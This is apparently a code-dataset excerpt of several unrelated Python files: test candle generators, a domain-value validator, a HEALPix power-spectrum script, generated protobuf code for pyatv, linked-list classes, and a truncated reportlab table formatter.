low_price = min_price if randint(0, 1) else randint(min_price, min_price + 10)
def range_candles(count: int) -> np.ndarray:
"""
Generates a range of candles with random values.
"""
fake_candle(reset=True)
arr = np.zeros((count, 6))
for i in range(count):
arr[i] = fake_candle()
return arr
def candles_from_close_prices(prices: Union[list, range]) -> np.ndarray:
"""
Generates a range of candles from a list of close prices.
The first candle has the timestamp of "2021-01-01T00:00:00+00:00"
"""
fake_candle(reset=True)
global first_timestamp
arr = []
prev_p = np.nan
for p in prices:
# first prev_p
if np.isnan(prev_p):
prev_p = p - 0.5
first_timestamp += 60000
open_p = prev_p
close_p = p
high_p = max(open_p, close_p)
low_p = min(open_p, close_p)
vol = randint(0, 200)
arr.append([first_timestamp, open_p, close_p, high_p, low_p, vol])
# save prev_p for next candle
prev_p = p
return np.array(arr)
def fake_candle(attributes: dict = None, reset: bool = False) -> np.ndarray:
global first_timestamp
global open_price
global close_price
global max_price
global high_price
global min_price
global low_price
if reset:
first_timestamp = 1609459080000
open_price = randint(40, 100)
close_price = randint(open_price, 110)
high_price = max(open_price, close_price)
low_price = min(open_price, close_price)
if attributes is None:
attributes = {}
first_timestamp += 60000
open_price = close_price
close_price += randint(1, 8)
high_price = max(open_price, close_price)
low_price = min(open_price - 1, close_price)
volume = randint(1, 100)
timestamp = first_timestamp
return np.array([
attributes.get('timestamp', timestamp),
attributes.get('open', open_price),
attributes.get('close', close_price),
attributes.get('high', high_price),
attributes.get('low', low_price),
attributes.get('volume', volume)
], dtype=np.float64)
|
py | b411268a6d3efa65c50f7cb2209a2b8986e42cf5 | import pickle
from typing import Any, Iterable
from .fuzzyfield import FuzzyField
from .errors import DomainError, FieldTypeError, MalformedFieldError
from .numbers import Float
_float_parser = Float()
class Domain(FuzzyField):
"""A field which can only accept a specific set of values
:param choices:
collection of acceptable values. The default needs not be included.
:param bool case_sensitive:
ignore case when validating string input.
The output will be converted to the case listed in choices.
:param bool passthrough:
If True, store the choices object by reference and assume it will
change after this class has been initialised.
The change will be reflected in the next parsed value.
Example::
v1 = String("ID", unique=True)
v2 = Domain("CrossRef", domain=v1.seen_values, passthrough=True)
In the above example, the field 'CrossRef' must be one of the values
that already appeared for the field 'ID'.
passthrough comes with a performance cost; set it to False
(the default) to allow for optimisations. This assumes that neither
the choices collection nor the objects it contains will change in the
future.
:param kwargs:
extra parameters for :class:`FuzzyField`
"""
choices: Iterable
case_sensitive: bool
passthrough: bool
def __init__(self, choices: Iterable, *, case_sensitive: bool = True,
passthrough: bool = False, **kwargs):
super().__init__(**kwargs)
self.choices = choices
self.case_sensitive = case_sensitive
self.passthrough = passthrough
if not passthrough:
self._parse_choices()
def _parse_choices(self) -> None:
"""Parse choices and update several cache fields.
This needs to be invoked after every time choices changes.
"""
self._has_numeric_choices = False
self._choices_map = {}
for v in self.choices:
k = v
if isinstance(v, str) and not self.case_sensitive:
k = v.lower()
elif isinstance(v, (int, float, complex)):
self._has_numeric_choices = True
try:
self._choices_map[k] = v
except TypeError:
k = pickle.dumps(v, protocol=pickle.HIGHEST_PROTOCOL)
self._choices_map[k] = v
# Build sorted list of choices, used for string representations
try:
sorted_choices = sorted(self.choices)
except TypeError:
# choices is a mix of incomparable types, e.g. (1, '2')
sorted_choices = sorted(self.choices, key=str)
self._choices_str = ",".join(str(choice) for choice in sorted_choices)
if len(self._choices_str) > 200:
self._choices_str = self._choices_str[:200] + '...'
def validate(self, value: Any) -> Any:
"""Validate and convert the input
:raises DomainError:
if the value is not one of the defined choices
"""
if self.passthrough:
self._parse_choices()
k = value
if isinstance(value, str) and not self.case_sensitive:
k = k.lower()
# This first paragraph quickly satisfies most use cases.
# Note that this returns the representation provided in the choices;
# e.g. Domain(choices=[1]).parse(1.0) returns 1
try:
return self._choices_map[k]
except KeyError:
pass
except TypeError:
# Unhashable
k = pickle.dumps(k, protocol=pickle.HIGHEST_PROTOCOL)
try:
return self._choices_map[k]
except KeyError:
pass
# Deal with string representation of numbers
if self._has_numeric_choices and isinstance(k, str):
try:
k = _float_parser.validate(k)
except (FieldTypeError, MalformedFieldError):
pass
else:
try:
return self._choices_map[k]
except KeyError:
pass
raise DomainError(self.name, value, self._choices_str)
@property
def sphinxdoc(self) -> str:
if self.passthrough:
if not self.choices:
return "Choice from a domain (dynamically defined at runtime)"
self._parse_choices()
return f"Any of: {self._choices_str}"
|
py | b411274910229a90433c4588fd5b10fc8e2cfd0b | import healpy as hp
import numpy as np
import matplotlib.pyplot as plt
# Set the number of sources and the coordinates for the input
nsources = int(20000)
nside = 8
npix = hp.nside2npix(nside)
# Coordinates and the density field f
#thetas = np.random.random(nsources) * np.pi
#phis = np.random.random(nsources) * np.pi * 2.
fs = np.random.randn(nsources)
with open("/home/tuos/tmp/tmp/newSTEG/m1000/eventFile2.txt") as inputFile:
lines = inputFile.readlines()
#print (lines[1].split()[1])
thetas=[]
phis=[]
for i in range(nsources):
thetas.append(float(lines[i].split()[1]))
phis.append(float(lines[i].split()[2]))
#print(thetas)
# Go from HEALPix coordinates to indices
indices = hp.ang2pix(nside, thetas, phis)
# Initate the map and fill it with the values
hpxmap = np.zeros(npix, dtype=np.float)
for i in range(nsources):
#hpxmap[indices[i]] += fs[i]
hpxmap[indices[i]] += 1.0
DPI = 100
SIZE = 400
# Inspect the map
#plt.figure(1)
'''
hp.mollview(hpxmap, xsize = SIZE)
plt.savefig("plot_toyModel_2000mAll.png", dpi = DPI)
'''
#plt.figure(2)
# Get the power spectrum
Cl = hp.anafast(hpxmap)
#print(Cl)
plt.plot(Cl)
plt.ylabel('C_{l}')
plt.savefig('plot_toyModel_power_spectrumAll.png')
|
py | b41127ac2ddd68ccb9ce6fb49456ca78c682460b | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/mrp/protobuf/NowPlayingInfo.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='pyatv/mrp/protobuf/NowPlayingInfo.proto',
package='',
syntax='proto2',
serialized_options=None,
serialized_pb=_b('\n\'pyatv/mrp/protobuf/NowPlayingInfo.proto\"\xbd\x04\n\x0eNowPlayingInfo\x12\r\n\x05\x61lbum\x18\x01 \x01(\t\x12\x0e\n\x06\x61rtist\x18\x02 \x01(\t\x12\x10\n\x08\x64uration\x18\x03 \x01(\x01\x12\x13\n\x0b\x65lapsedTime\x18\x04 \x01(\x01\x12\x14\n\x0cplaybackRate\x18\x05 \x01(\x02\x12.\n\nrepeatMode\x18\x06 \x01(\x0e\x32\x1a.NowPlayingInfo.RepeatMode\x12\x30\n\x0bshuffleMode\x18\x07 \x01(\x0e\x32\x1b.NowPlayingInfo.ShuffleMode\x12\x11\n\ttimestamp\x18\x08 \x01(\x01\x12\r\n\x05title\x18\t \x01(\t\x12\x18\n\x10uniqueIdentifier\x18\n \x01(\x04\x12\x17\n\x0fisExplicitTrack\x18\x0b \x01(\x08\x12\x12\n\nisMusicApp\x18\x0c \x01(\x08\x12\x1e\n\x16radioStationIdentifier\x18\r \x01(\x03\x12\x18\n\x10radioStationHash\x18\x0e \x01(\t\x12\x18\n\x10radioStationName\x18\x0f \x01(\t\x12\x19\n\x11\x61rtworkDataDigest\x18\x10 \x01(\x0c\x12\x14\n\x0cisAlwaysLive\x18\x11 \x01(\x08\x12\x17\n\x0fisAdvertisement\x18\x12 \x01(\x08\"+\n\nRepeatMode\x12\x0b\n\x07Unknown\x10\x00\x12\x07\n\x03One\x10\x01\x12\x07\n\x03\x41ll\x10\x02\"9\n\x0bShuffleMode\x12\n\n\x06Unkown\x10\x00\x12\x07\n\x03Off\x10\x01\x12\n\n\x06\x41lbums\x10\x02\x12\t\n\x05Songs\x10\x03')
)
_NOWPLAYINGINFO_REPEATMODE = _descriptor.EnumDescriptor(
name='RepeatMode',
full_name='NowPlayingInfo.RepeatMode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unknown', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='One', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='All', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=515,
serialized_end=558,
)
_sym_db.RegisterEnumDescriptor(_NOWPLAYINGINFO_REPEATMODE)
_NOWPLAYINGINFO_SHUFFLEMODE = _descriptor.EnumDescriptor(
name='ShuffleMode',
full_name='NowPlayingInfo.ShuffleMode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unkown', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Off', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Albums', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Songs', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=560,
serialized_end=617,
)
_sym_db.RegisterEnumDescriptor(_NOWPLAYINGINFO_SHUFFLEMODE)
_NOWPLAYINGINFO = _descriptor.Descriptor(
name='NowPlayingInfo',
full_name='NowPlayingInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='album', full_name='NowPlayingInfo.album', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='artist', full_name='NowPlayingInfo.artist', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='duration', full_name='NowPlayingInfo.duration', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='elapsedTime', full_name='NowPlayingInfo.elapsedTime', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='playbackRate', full_name='NowPlayingInfo.playbackRate', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='repeatMode', full_name='NowPlayingInfo.repeatMode', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shuffleMode', full_name='NowPlayingInfo.shuffleMode', index=6,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='timestamp', full_name='NowPlayingInfo.timestamp', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='NowPlayingInfo.title', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='uniqueIdentifier', full_name='NowPlayingInfo.uniqueIdentifier', index=9,
number=10, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isExplicitTrack', full_name='NowPlayingInfo.isExplicitTrack', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isMusicApp', full_name='NowPlayingInfo.isMusicApp', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationIdentifier', full_name='NowPlayingInfo.radioStationIdentifier', index=12,
number=13, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationHash', full_name='NowPlayingInfo.radioStationHash', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationName', full_name='NowPlayingInfo.radioStationName', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='artworkDataDigest', full_name='NowPlayingInfo.artworkDataDigest', index=15,
number=16, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isAlwaysLive', full_name='NowPlayingInfo.isAlwaysLive', index=16,
number=17, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isAdvertisement', full_name='NowPlayingInfo.isAdvertisement', index=17,
number=18, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_NOWPLAYINGINFO_REPEATMODE,
_NOWPLAYINGINFO_SHUFFLEMODE,
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=44,
serialized_end=617,
)
_NOWPLAYINGINFO.fields_by_name['repeatMode'].enum_type = _NOWPLAYINGINFO_REPEATMODE
_NOWPLAYINGINFO.fields_by_name['shuffleMode'].enum_type = _NOWPLAYINGINFO_SHUFFLEMODE
_NOWPLAYINGINFO_REPEATMODE.containing_type = _NOWPLAYINGINFO
_NOWPLAYINGINFO_SHUFFLEMODE.containing_type = _NOWPLAYINGINFO
DESCRIPTOR.message_types_by_name['NowPlayingInfo'] = _NOWPLAYINGINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NowPlayingInfo = _reflection.GeneratedProtocolMessageType('NowPlayingInfo', (_message.Message,), {
'DESCRIPTOR' : _NOWPLAYINGINFO,
'__module__' : 'pyatv.mrp.protobuf.NowPlayingInfo_pb2'
# @@protoc_insertion_point(class_scope:NowPlayingInfo)
})
_sym_db.RegisterMessage(NowPlayingInfo)
# @@protoc_insertion_point(module_scope)
|
py | b41128f962f687dd6ca7073ec6c41130c3425eb7 | class SinglyLinkedListNode():
def __init__(self):
self.data = None
self.next = None
class SinglyLinkedList():
def __init__(self):
self.head = None
self.size = 0
def prepend(self, value):
"""
Add an element at the head of the list. Point the new element's 'next'
at the previous head, shifting all remaining elements to the right.
:param value: data to add
"""
new_node = SinglyLinkedListNode()
new_node.data = value
new_node.next = self.head
self.head = new_node
self.size += 1
def append(self, value):
"""
Add an element at the tail of the list. Update the previous final
element's 'next' to point to the new element.
:param value: data to add
"""
new_node = SinglyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
while curr_node is not None:
prev_node = curr_node
curr_node = curr_node.next
if prev_node:
prev_node.next = new_node
else:
self.head = new_node
self.size += 1
def insert(self, value):
"""
Insert an element in the list.
This method exists for convenient naming.
:param value: data to add
"""
self.prepend(value)
def insert_at(self, value, position):
"""
Insert an element at a specified position.
This method exists for convenient naming.
:param value: data to add
:param position: index to insert at
"""
if position >= self.size:
raise IndexError
new_node = SinglyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
curr_index = 0
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
if prev_node:
prev_node.next = new_node
else:
curr_node.next = curr_node
curr_node = new_node
self.size += 1
def find(self, value):
"""
Find an element in the list
:param value: data to find
"""
curr_node = self.head
while curr_node is not None:
if curr_node.data == value:
return curr_node
curr_node = curr_node.next
if curr_node is None:
raise ValueError('{} not found'.format(value))
def find_at(self, position):
"""
Get the element at a given position
:param position: index to retrieve
"""
if position >= self.size:
raise IndexError
curr_node = self.head
curr_index = 0
while curr_index < position:
curr_node = curr_node.next
curr_index += 1
return curr_node
def delete(self, value):
"""
Remove an element in the list.
:param value: data to remove
"""
curr_node = self.head
prev_node = None
# walk the list
while curr_node is not None:
# if we find a match, short circuit the loop.
if curr_node.data == value:
break
# if we don't match, update the previous elements "pointer"
# to the target's "next"
else:
prev_node = curr_node
curr_node = curr_node.next
# raise if we haven't found anything
if curr_node is None:
raise ValueError('{} not found'.format(value))
if prev_node is not None:
prev_node.next = curr_node.next
else:
self.head = curr_node.next
self.size -= 1
def delete_at(self, position):
"""
Remove the element at a given index.
:param position: index to remove
"""
if position >= self.size:
raise IndexError
curr_node = self.head
prev_node = None
curr_index = 0
# walk the list
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
if prev_node is not None:
prev_node.next = curr_node.next
else:
self.head = curr_node.next
self.size -= 1
class DoublyLinkedListNode():
def __init__(self):
self.data = None
self.next = None
self.prev = None
class DoublyLinkedList():
def __init__(self):
self.head = None
self.size = 0
def prepend(self, value):
"""
Add an element at the head of the list. Point the new element's 'next'
at the previous head, shifting all remaining elements to the right.
:param value: data to add
"""
new_node = DoublyLinkedListNode()
new_node.data = value
# If we have a DLL B <-> C and prepend A, we should get A <-> B <-> C
curr_head = self.head
new_node.next = curr_head
new_node.prev = None
if curr_head is not None:
curr_head.prev = new_node
self.head = new_node
self.size += 1
def append(self, value):
"""
Add an element at the tail of the list. Update the previous final
element's 'next' to point to the new element.
:param value: data to add
"""
new_node = DoublyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
while curr_node is not None:
prev_node = curr_node
curr_node = curr_node.next
if prev_node:
prev_node.next = new_node
new_node.prev = prev_node
else:
self.head = new_node
self.size += 1
def insert(self, value):
"""
Insert an element in the list.
This method exists for convenient naming.
:param value: data to add
"""
self.prepend(value)
def insert_at(self, value, position):
"""
Insert an element at a specified position.
This method exists for convenient naming.
:param value: data to add
:param position: index to insert at
"""
if position >= self.size:
raise IndexError
new_node = DoublyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
curr_index = 0
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
if prev_node:
prev_node.next = new_node
new_node.prev = prev_node
else:
curr_node.next = curr_node
curr_node = new_node
self.size += 1
def find(self, value):
"""
Find an element in the list
:param value: data to find
"""
curr_node = self.head
while curr_node is not None:
if curr_node.data == value:
return curr_node
curr_node = curr_node.next
if curr_node is None:
raise ValueError('{} not found'.format(value))
def find_at(self, position):
"""
Get the element at a given position
:param position: index to retrieve
"""
if position >= self.size:
raise IndexError
curr_node = self.head
curr_index = 0
while curr_index < position:
curr_node = curr_node.next
curr_index += 1
return curr_node
def delete(self, value):
"""
Remove an element in the list.
:param value: data to remove
"""
curr_node = self.head
prev_node = None
# walk the list
while curr_node is not None:
# if we find a match, short circuit the loop.
if curr_node.data == value:
break
# if we don't match, update the previous elements "pointer"
# to the target's "next"
else:
prev_node = curr_node
curr_node = curr_node.next
# raise if we haven't found anything
if curr_node is None:
raise ValueError('{} not found'.format(value))
if prev_node is None:
self.head = curr_node.next
elif prev_node is not None and curr_node.next is not None:
prev_node.next = curr_node.next
curr_node.next.prev = prev_node
else:
prev_node.next = curr_node.next
self.size -= 1
def delete_at(self, position):
"""
Remove the element at a given index.
:param position: index to remove
"""
if position >= self.size:
raise IndexError
curr_node = self.head
prev_node = None
curr_index = 0
# walk the list
while curr_index < position:
prev_node = curr_node
curr_node = curr_node.next
curr_index += 1
if prev_node is None:
self.head = curr_node.next
elif prev_node is not None and curr_node.next is not None:
prev_node.next = curr_node.next
curr_node.next.prev = prev_node
else:
prev_node.next = curr_node.next
self.size -= 1
|
py | b4112934d5c56f754f0b25e22a7f1f629c355312 | from reportlab.platypus import Table, TableStyle, Flowable
from reportlab.lib.colors import grey, white, HexColor, black, gray
from matplotlib.colors import rgb2hex, LinearSegmentedColormap
from matplotlib.pyplot import get_cmap
import numpy as np
import pandas as pd
from tia.rlab.components import KeepInFrame
import tia.util.fmt as fmt
__all__ = [
"ConditionalRedBlack",
"DynamicTable",
"TableFormatter",
"RegionFormatter",
"IntFormatter",
"FloatFormatter",
"PercentFormatter",
"ThousandsFormatter",
"MillionsFormatter",
"BillionsFormatter",
"DollarCentsFormatter",
"DollarFormatter",
"ThousandDollarsFormatter",
"MillionDollarsFormatter",
"BillionDollarsFormatter",
"YmdFormatter",
"Y_m_dFormatter",
"DynamicNumberFormatter",
"BorderTypeGrid",
"BorderTypeHorizontal",
"BorderTypeOutline",
"BorderTypeOutline",
"BorderTypeVertical",
"Style",
"BorderTypeOutlineCols",
]
DefaultHeaderStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 3,
"TOPPADDING": 3,
"FONTSIZE": 6,
"BACKGROUND": HexColor("#404040"),
"FONTNAME": "Helvetica",
"ALIGN": "CENTER",
"TEXTCOLOR": white,
}
DefaultCellStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 2,
"TOPPADDING": 2,
"ALIGN": "CENTER",
"TEXTCOLOR": black,
"ROWBACKGROUNDS": [[HexColor("#e3ebf4"), white]],
"FONTSIZE": 6,
"FONTNAME": "Helvetica", # "FONTNAME": "Courier"
}
DefaultIndexStyle = {
"GRID": (0.5, grey),
"BOX": (0.25, black),
"VALIGN": "MIDDLE",
"LEADING": 6,
"LEFTPADDING": 3,
"RIGHTPADDING": 3,
"BOTTOMPADDING": 2,
"TOPPADDING": 2,
"ALIGN": "RIGHT",
"TEXTCOLOR": black,
"ROWBACKGROUNDS": [[HexColor("#e3ebf4"), white]],
"FONTSIZE": 6,
"FONTNAME": "Helvetica",
}
DefaultWeight = 0.7
AlignRight = {"ALIGN": "RIGHT"}
ConditionalRedBlack = lambda x: x < 0 and dict(TEXTCOLOR=HexColor("#800000"))
def pad_positive_wrapper(fmtfct):
"""Ensure that numbers are aligned in table by appending a blank space to postive values if 'parenthesis' are
used to denote negative numbers"""
def check_and_append(*args, **kwargs):
result = fmtfct(*args, **kwargs)
if fmtfct.parens and not result.endswith(")"):
result += " "
return result
return check_and_append
IntFormatter = pad_positive_wrapper(fmt.new_int_formatter(nan="-"))
FloatFormatter = pad_positive_wrapper(fmt.new_float_formatter(nan="-"))
PercentFormatter = pad_positive_wrapper(fmt.new_percent_formatter(nan="-"))
ThousandsFormatter = pad_positive_wrapper(fmt.new_thousands_formatter(nan="-"))
MillionsFormatter = pad_positive_wrapper(fmt.new_millions_formatter(nan="-"))
BillionsFormatter = pad_positive_wrapper(fmt.new_billions_formatter(nan="-"))
# Don't attempt to pad
DynamicNumberFormatter = fmt.DynamicNumberFormat(
method="col", nan="-", pcts=1, trunc_dot_zeros=1
)
DollarCentsFormatter = pad_positive_wrapper(
fmt.new_float_formatter(prefix="$", nan="-")
)
DollarFormatter = pad_positive_wrapper(fmt.new_int_formatter(prefix="$", nan="-"))
ThousandDollarsFormatter = pad_positive_wrapper(
fmt.new_thousands_formatter(prefix="$", nan="-")
)
MillionDollarsFormatter = pad_positive_wrapper(
fmt.new_millions_formatter(prefix="$", nan="-")
)
BillionDollarsFormatter = pad_positive_wrapper(
fmt.new_billions_formatter(prefix="$", nan="-")
)
YmdFormatter = fmt.new_datetime_formatter("%Y%m%d", True)
Y_m_dFormatter = fmt.new_datetime_formatter("%Y-%m-%d", True)
mdYFormatter = fmt.new_datetime_formatter("%m/%d/%Y", True)
class DynamicTable(Table):
def __init__(self, data, on_wrap=None, **kwargs):
self.on_wrap = on_wrap
Table.__init__(self, data, **kwargs)
self._longTableOptimize = 0
def wrap(self, awidth, aheight):
self.on_wrap and self.on_wrap(self, awidth, aheight)
return Table.wrap(self, awidth, aheight)
def is_contiguous(idx):
if len(idx) > 0:
s0, s1 = idx.min(), idx.max()
expected = pd.Int64Index(np.array(list(range(s0, s1 + 1))))
# return idx.isin(expected).all()
return expected.isin(idx).all()
def find_locations(index, match_value_or_fct, levels=None, max_matches=0):
matches = []
fct = match_value_or_fct
if not callable(fct):
match_value = match_value_or_fct
if not isinstance(match_value, str) and hasattr(match_value, "__iter__"):
fct = lambda v: v in match_value
else:
fct = lambda v: v == match_value_or_fct
for lvl, loc, val in level_iter(index, levels):
if fct(val):
matches.append(loc)
if max_matches and len(matches) >= matches:
break
return matches
def level_iter(index, levels=None):
if levels is None:
levels = list(range(index.nlevels))
elif np.isscalar(levels):
levels = [levels]
for level in levels:
for i, v in enumerate(index.get_level_values(level)):
yield level, i, v
def span_iter(series):
sorted = series.sort_index()
isnull = pd.isnull(sorted).values
isnulleq = isnull[1:] & isnull[:-1]
iseq = sorted.values[1:] == sorted.values[:-1]
eq = isnulleq | iseq
li = 0
for i in range(len(eq)):
islast = i == (len(eq) - 1)
if eq[i]: # if currently true then consecutive
if islast or not eq[i + 1]:
yield sorted.index[li], sorted.index[i + 1]
else:
li = i + 1
raise StopIteration
class BorderType(object):
def __init__(
self,
weight=DefaultWeight,
color=black,
cap=None,
dashes=None,
join=None,
count=None,
space=None,
):
args = locals()
args.pop("self")
self.kwargs = args
def apply(self, rng, **overrides):
args = self.kwargs.copy()
args.update(overrides)
self._do_apply(rng, args)
def _do_apply(self, rng, args):
raise NotImplementedError()
class BorderTypeGrid(BorderType):
def _do_apply(self, rng, args):
rng.set_grid(**args)
class BorderTypeOutline(BorderType):
def _do_apply(self, rng, args):
rng.set_box(**args)
class BorderTypeHorizontal(BorderType):
def _do_apply(self, rng, args):
fct = lambda r: (r.set_lineabove(**args), r.set_linebelow(**args))
[fct(row) for row in rng.iter_rows()]
class BorderTypeOutlineCols(BorderType):
def _do_apply(self, rng, args):
[col.set_box(**args) for col in rng.iter_cols()]
class BorderTypeVertical(BorderType):
def _do_apply(self, rng, args):
fct = lambda r: (r.set_linebefore(**args), r.set_lineafter(**args))
[fct(col) for col in rng.iter_cols()]
class Style(object):
Blue = {
"Light": HexColor("#dce6f1"),
"Medium": HexColor("#95b3d7"),
"Dark": HexColor("#4f81bd"),
}
Black = {"Light": HexColor("#d9d9d9"), "Medium": HexColor("#6c6c6c"), "Dark": black}
Red = {
"Light": HexColor("#f2dcdb"),
"Medium": HexColor("#da9694"),
"Dark": HexColor("#c0504d"),
}
Lime = {
"Light": HexColor("#ebf1de"),
"Medium": HexColor("#c4d79b"),
"Dark": HexColor("#9bbb59"),
}
Purple = {
"Light": HexColor("#e4dfec"),
"Medium": HexColor("#b1a0c7"),
"Dark": HexColor("#8064a2"),
}
Orange = {
"Light": HexColor("#fde9d9"),
"Medium": HexColor("#fabf8f"),
"Dark": HexColor("#f79646"),
}
Cyan = {
"Light": HexColor("#eff4f6"),
"Medium": HexColor("#a8c2cb"),
"Dark": HexColor("#3b595f"),
}
DarkBlue = {
"Light": HexColor("#e5eaee "),
"Medium": HexColor("#9aabbc"),
"Dark": HexColor("#042f59"),
}
@staticmethod
def apply_basic(
formatter,
font="Helvetica",
font_bold="Helvetica-Bold",
font_size=8,
rpad=None,
lpad=None,
bpad=None,
tpad=None,
colspans=1,
rowspans=0,
):
lpad = 4.0 / 8.0 * font_size if lpad is None else 3
rpad = 4.0 / 8.0 * font_size if rpad is None else 3
bpad = 4.0 / 8.0 * font_size if bpad is None else 4
tpad = 4.0 / 8.0 * font_size if tpad is None else 4
formatter.all.set_font(font, size=font_size, leading=font_size)
formatter.all.set_pad(lpad, bpad, rpad, tpad)
formatter.all.set_valign_middle()
# do the default things
formatter.header.set_font(font_bold)
formatter.header.set_align_center()
formatter.index_header.set_font(font_bold)
formatter.index_header.set_align_left()
formatter.index.set_font(font_bold)
formatter.index.set_align_left()
formatter.cells.set_font(font)
formatter.cells.set_align_right()
# do col spans and row spans
if rowspans and formatter.index.ncols > 1:
formatter.index.iloc[:, : formatter.index.ncols - 1].detect_rowspans()
if colspans and formatter.header.nrows > 1:
formatter.header.iloc[: formatter.header.nrows - 1, :].detect_colspans()
@staticmethod
def apply_color(
